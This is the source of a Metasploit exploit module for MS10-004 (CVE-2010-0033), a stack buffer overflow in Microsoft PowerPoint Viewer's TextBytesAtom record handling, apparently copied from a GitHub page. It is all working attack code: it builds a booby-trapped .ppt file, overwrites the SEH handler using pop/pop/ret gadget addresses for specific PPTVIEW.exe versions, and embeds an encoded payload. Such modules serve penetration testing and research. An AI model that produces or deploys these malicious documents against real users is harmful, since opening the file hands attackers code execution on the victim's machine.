/
ms10_004_textbytesatom.rb
261 lines (215 loc) · 7.74 KB
/
ms10_004_textbytesatom.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/ole'
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'MS10-004 Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow vulnerability in the handling of
the TextBytesAtom records by Microsoft PowerPoint Viewer. According to Microsoft,
the PowerPoint Viewer distributed with Office 2003 SP3 and earlier, as well as
Office 2004 for Mac, are vulnerable.
NOTE: The vulnerable code path is not reachable on versions of Windows prior to
Windows Vista.
},
'License' => MSF_LICENSE,
'Author' =>
[
'SkD', # original discovery
'Snake', # PoC
'jduck' # metasploit version
],
'References' =>
[
[ 'CVE', '2010-0033' ],
[ 'OSVDB', '62241' ],
[ 'MSB', 'MS10-004' ],
[ 'ZDI', '10-017' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => true
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'DisableNops' => true # no need
},
'Platform' => 'win',
'Targets' =>
[
# Tested with various patch levels of PowerPoint Viewer 2003 (v6.0.2600.0)
[ 'Microsoft PowerPoint Viewer 2003',
{
'SEHOffset' => 132,
'PopPopRet' => 0x30056471 # pop/pop/ret from PPTVIEW.exe v11.0.5703.0
}
],
[ 'Microsoft PowerPoint Viewer 2003 (kb949041 or kb956500) or Office 2003 SP3',
{
'SEHOffset' => 132,
'PopPopRet' => 0x3003c767 # pop/pop/ret from PPTVIEW.exe v11.0.8164.0
}
],
=begin
#
# This is commented out because of ASLR. gdiplus is no good.
#
[ 'Microsoft PowerPoint Viewer 2003 (kb956500 or kb969615)',
{
'SEHOffset' => 132,
#'PopPopRet' => 0x39827475 # pop/pop/ret from gdiplus.dll v11.0.8230.0
'PopPopRet' => 0x69647475
}
],
=end
[ 'Microsoft PowerPoint Viewer 2003 (kb969615)',
{
'SEHOffset' => 132,
'PopPopRet' => 0x300566d1 # pop/pop/ret from PPTVIEW.exe v11.0.8305.0
}
],
#
# All that is needed for new targets are the two vars! msfpescan will help.
#
# crash on a deref path to heaven.
[ 'Crash Target for Debugging',
{
'SEHOffset' => 132,
'PopPopRet' => 0xdac0ffee
}
]
],
'DisclosureDate' => '2010-02-09'))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.ppt']),
OptString.new('OUTPUTPATH', [ true, 'Path to output the file', Msf::Config.local_directory ])
])
end
def ppt_record(tag, data=nil, ver=0, inst=0)
data ||= ''
ret = ''
verinst = (ver & 0xf) | (inst << 4)
ret << [verinst, tag, data.length].pack('vvV')
ret << data
ret
end
def exploit
print_status("Creating PowerPoint Document ...")
username = Rex::Text.rand_text_alphanumeric(8+rand(8))
# smash the stack, hit SEH, use the pop-pop-ret to execute code on the stack
sploit = rand_text(target['SEHOffset'])
sploit << generate_seh_record(target['PopPopRet'])
# jump ahead into the next atom
distance = 10
sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+" + distance.to_s).encode_string
# TextBytesAtom
text_bytes_atom = ppt_record(0xfa8, sploit)
text_bytes_atom[4,4] = [0xffffffff].pack('V') # ..f8 thru ..ff
#text_bytes_atom << ppt_record(0xfa8, "\xcc" + ("A" * 2046) + "\xcc")
text_bytes_atom << ppt_record(0xfa8, ("A" * 16) + payload.encoded)
# SlidePersistAtom
spa1_data = [2,0,0,0x80000000,0].pack('VVVVV')
spa1 = ppt_record(0x3f3, spa1_data)
# SlideListWithText (first)
slwt1 = ppt_record(0xff0, spa1, 15, 1)
# SlidePersistAtom
spa2_data = ''
spa2_data << [3,0,2,0x100,0].pack('VVVVV')
# SlideListWithText container (2nd)
slwt2_data = ''
slwt2_data << ppt_record(0x3f3, spa2_data)
# TextHeaderAtom
txt_hdr_data = [6].pack('V') # textType
slwt2_data << ppt_record(0xf9f, txt_hdr_data)
slwt2_data << text_bytes_atom
slwt2 = ppt_record(0xff0, slwt2_data, 15)
# Document container
doc_data = ''
doc_data << slwt1
doc_data << slwt2
doc = ppt_record(0x3e8, doc_data, 15)
# MainMaster container
mdc_data = ppt_record(0xf003, '', 15)
ppd_data = ppt_record(0xf002, mdc_data, 15)
# TextMasterStyleAtom
tmsa_data = [0].pack('v') # cLevels (none)
mm_data = ''
mm_data << ppt_record(0xfa3, tmsa_data)
mm_data << ppt_record(0x40c, ppd_data, 15)
mm = ppt_record(0x3f8, mm_data, 15)
# assembled stream contents
content = ''
document_offset = content.length
content << doc
main_master_offset = content.length
content << mm
# PersistPtrIncrementalBlock
start_num = 1
count = 2
ppib_data = [(start_num & 0xfffff) | (count << 20)].pack('V')
ppib_data << [document_offset].pack('V')
ppib_data << [main_master_offset].pack('V')
ppib = ppt_record(0x1772, ppib_data)
# Store offset and add it
persist_ptr_incremental_block_offset = content.length
content << ppib
# UserEditAtom
uea_data = ''
uea_data << [0x100].pack('V') # lastSlideIdRef
uea_data << [0x1599,0,3].pack('vCC') # version, minorVer, majorVer
uea_data << [0].pack('V') # offsetLastEdit
uea_data << [persist_ptr_incremental_block_offset].pack('V')
uea_data << [1].pack('V') # docPersistIdRef
uea_data << [3].pack('V') # persistIdSeed
uea_data << [1].pack('v') # lastView
uea_data << [0x31c5].pack('v') # unused??
uea = ppt_record(0xff5, uea_data)
# Store offset and add it
user_edit_atom_offset = content.length
content << uea
# Create the output file
out = File.join(datastore['OUTPUTPATH'], datastore['FILENAME'])
stg = Rex::OLE::Storage.new(out, Rex::OLE::STGM_WRITE)
if (not stg)
fail_with(Failure::Unknown, 'Unable to create output file')
end
# PowerPoint Document stream
stm = stg.create_stream("PowerPoint Document")
if (not stm)
fail_with(Failure::Unknown, 'Unable to create "PowerPoint Document" stream')
end
stm << content
stm.close
# CurrentUserAtom stream
cua_data = ''
cua_data << [0x14].pack('V') # size
cua_data << [0xe391c05f].pack('V') # headerToken (not encrypted)
cua_data << [user_edit_atom_offset].pack('V')
cua_data << [username.length].pack('v')
cua_data << [0x3f4].pack('v') # docFileVersion
cua_data << [3,0].pack('CC') # majorVer, minorVer
cua_data << [0x3b].pack('v') # unused??
cua_data << username
cua_data << [8].pack('V') # relVersion (1 master slide)
cua_data << Rex::Text.to_unicode(username)
current_user_stream = ppt_record(0xff6, cua_data)
stm = stg.create_stream("Current User")
if (not stm)
fail_with(Failure::Unknown, 'Unable to create "Current User" stream')
end
stm << current_user_stream
stm.close
stg.close
print_status("Generated output file #{out}")
end
end